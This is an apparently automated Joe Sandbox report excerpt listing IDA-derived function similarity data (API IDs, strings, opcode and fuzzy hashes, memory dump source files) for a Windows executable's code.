                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                        • Instruction ID: 1cc7a2315333f1ab38db0f2ff978384dbc3ad52d1c19524715aa93af6a47c5ce
                                                                                        • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                        • Instruction Fuzzy Hash: FFD01212E09451C2EF10D73BA89107C2750AFE2735FA40730E63EC26E1DF1DA496E311
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                        • Instruction ID: 8e74601da509eabb9dfb46bf47ef97c58fccfe75a68545ddde8bc83d2b0c3dbe
                                                                                        • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                        • Instruction Fuzzy Hash: 60C08C21F06502C1DF089B2BC8C905C13A4BBA0B04F604034E12CC11A0EE2CD4FE9345
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                        • Instruction ID: dfa2150f0eab366929a52635024403f98e943e3bf713ee51644b64b616176b9c
                                                                                        • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                        • Instruction Fuzzy Hash: D8F04454F0A20749FF58EA7799513F45A80AFF9B80F0C5430F92ECA3C2FE2CA6818210
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                        • Instruction ID: 4ddace2e5385fbd1188cf1cc798af9738d2dd2a97bd5aed425c64e97ab7cfc56
                                                                                        • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                        • Instruction Fuzzy Hash: F2F08C62E0868285FB24CB22E04127D2A61EBA4B78F484335F73D811D8EE28D8A5C300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                        • Instruction ID: e14eed25e63ed3fd3ff63db42d2ec70fb54553b470298dc793d9353d2e44daae
                                                                                        • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                        • Instruction Fuzzy Hash: 7DF0DF51F0924B45FF6CEAA359516B51A90AFE87A0F485A30F97EC67C2FE2CA4808211
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 2659423929-3508440684
                                                                                        • Opcode ID: 728ca5c511583d96efffbafc78ffbc9d028dc1943734bb9c87de0126960d7cef
                                                                                        • Instruction ID: 9c8f303274d7f5564431f23d28781a96cc1276625833bb696a3f8f047e3e0fe8
                                                                                        • Opcode Fuzzy Hash: 728ca5c511583d96efffbafc78ffbc9d028dc1943734bb9c87de0126960d7cef
                                                                                        • Instruction Fuzzy Hash: 18629162F0864285FB00DB76D4442AD2B61ABE57A4F504332FA7D97AE5EF3CE685C301
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                        • String ID: %ls$%s: %s
                                                                                        • API String ID: 2539828978-2259941744
                                                                                        • Opcode ID: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                                                                                        • Instruction ID: dbe53ad7f3d9dad417b5922559726cae02c5926f750c0d8bdc43a0601712a1c4
                                                                                        • Opcode Fuzzy Hash: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                                                                                        • Instruction Fuzzy Hash: 7CB25362E5968281EB14DB26D4542BE6712BFE9790F104336F6BD877EAFE2CE544C300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 1759834784-2761157908
                                                                                        • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                        • Instruction ID: 91dcdd20e514a0a4736bf5b824c73730430177f71781f43a52df62bb39a82979
                                                                                        • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                        • Instruction Fuzzy Hash: 8CB2E872F085928BE725CE6A9440AFD2B91FBE4788F505135EA2AD7BC4EF38E544C740
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                        • String ID: rtmp
                                                                                        • API String ID: 3587137053-870060881
                                                                                        • Opcode ID: 5e507f6e96efdb11ced4af7afdc0703881383effb4b77f0e0126ffc0c5db1fa5
                                                                                        • Instruction ID: ea579755d51b7d0e0367e320aee085b30f892930591340c25655facdc3377413
                                                                                        • Opcode Fuzzy Hash: 5e507f6e96efdb11ced4af7afdc0703881383effb4b77f0e0126ffc0c5db1fa5
                                                                                        • Instruction Fuzzy Hash: 98F17F22F08A4285FB10DB66D4801ED6B61EBE57D4F501132FA6D87AE9EF3CE588C740
APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: FullNamePath_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1693479884-0
APIs
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FE1BFAC4
  • Part of subcall function 00007FF6FE1B7934: GetCurrentProcess.KERNEL32(00007FF6FE1C0CCD), ref: 00007FF6FE1B7961
Strings
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
APIs
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
APIs
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID:
• API String ID: 1365068426-0
Strings
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
APIs
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
APIs
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID:
• API String ID: 1061551593-0
APIs
                                                                                        Similarity
                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                        • String ID:
                                                                                        • API String ID: 2169056816-0
                                                                                        • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                        • Instruction ID: cadbfc35a39954b54b7ce05d604ea44a55bd48ff7bf2fa8f719eb4961680520b
                                                                                        • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                        • Instruction Fuzzy Hash: EA115C36A08B8195E761CF12E4007E97761FFD8B48F844135EA5D83AA8EF3CE149C744
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1924C0: CreateFileW.KERNELBASE ref: 00007FF6FE19259B
                                                                                          • Part of subcall function 00007FF6FE1924C0: GetLastError.KERNEL32 ref: 00007FF6FE1925AE
                                                                                          • Part of subcall function 00007FF6FE1924C0: CreateFileW.KERNEL32 ref: 00007FF6FE19260E
                                                                                          • Part of subcall function 00007FF6FE1924C0: GetLastError.KERNEL32 ref: 00007FF6FE192617
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1915D0
                                                                                          • Part of subcall function 00007FF6FE193980: MoveFileW.KERNEL32 ref: 00007FF6FE1939BD
                                                                                          • Part of subcall function 00007FF6FE193980: MoveFileW.KERNEL32 ref: 00007FF6FE193A34
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 34527147-0
                                                                                        • Opcode ID: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
                                                                                        • Instruction ID: 0e09924f4b52e989a3697c0115fb80c6a3a8be45a5d00fc0827f8b267108c812
                                                                                        • Opcode Fuzzy Hash: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
                                                                                        • Instruction Fuzzy Hash: 68918B62F18A4682EB10DB67E4442AE6B61FBE5BC4F414032FE1D97BD9EE38D585C340
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                        • Instruction ID: ee79a550b97e72e01bfe593605bf10280620ffee6da4cdbc85f45a0636bc3fd9
                                                                                        • Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
                                                                                        • Instruction Fuzzy Hash: 1F017C71D4D98389FB31CB26A4943F92B91ABF9306F440134F5BD866D5EE2CB098CA04
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: 0
                                                                                        • API String ID: 3215553584-4108050209
                                                                                        • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                        • Instruction ID: 4418f5b94f595c7ed4b395c7fe0f994b2d7be5e84075015c7eeb8560109d99b9
                                                                                        • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                        • Instruction Fuzzy Hash: 9181D321E2824286EBA8CA2780806BD6A91EFF1F44F541536FD29D77D5EF3DE846C740
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: 0
                                                                                        • API String ID: 3215553584-4108050209
                                                                                        • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                        • Instruction ID: 1e37667efa94a1a4bc0f071dfa94c4fc1f6160e860c44939440db72ecb151f94
                                                                                        • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                        • Instruction Fuzzy Hash: FC71E561E0C28246EBA8CA3B81402BD6F90AFE1F44F141935FD29D77D6EF2DE8468741
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gj
                                                                                        • API String ID: 0-4203073231
                                                                                        • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                        • Instruction ID: 6c39bd0cac1b9f721bdfe749d4b368cd4061e1658d733742cc5ead6a080ae246
                                                                                        • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                        • Instruction Fuzzy Hash: 1D51B137B286908BD724CF26E40099E77A5F388758F045126FF9A83B48DB39E945CF40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                        • Instruction ID: dcd83db7fd2c3d85b3bda897f47599bd5cbb085792436433b4d7ba959fd43cc6
                                                                                        • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                        • Instruction Fuzzy Hash: 1241C022B14A4586EF08CF2BD4142A977A6B7A8FD0B499036EE2EC7794EE3CD041C300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
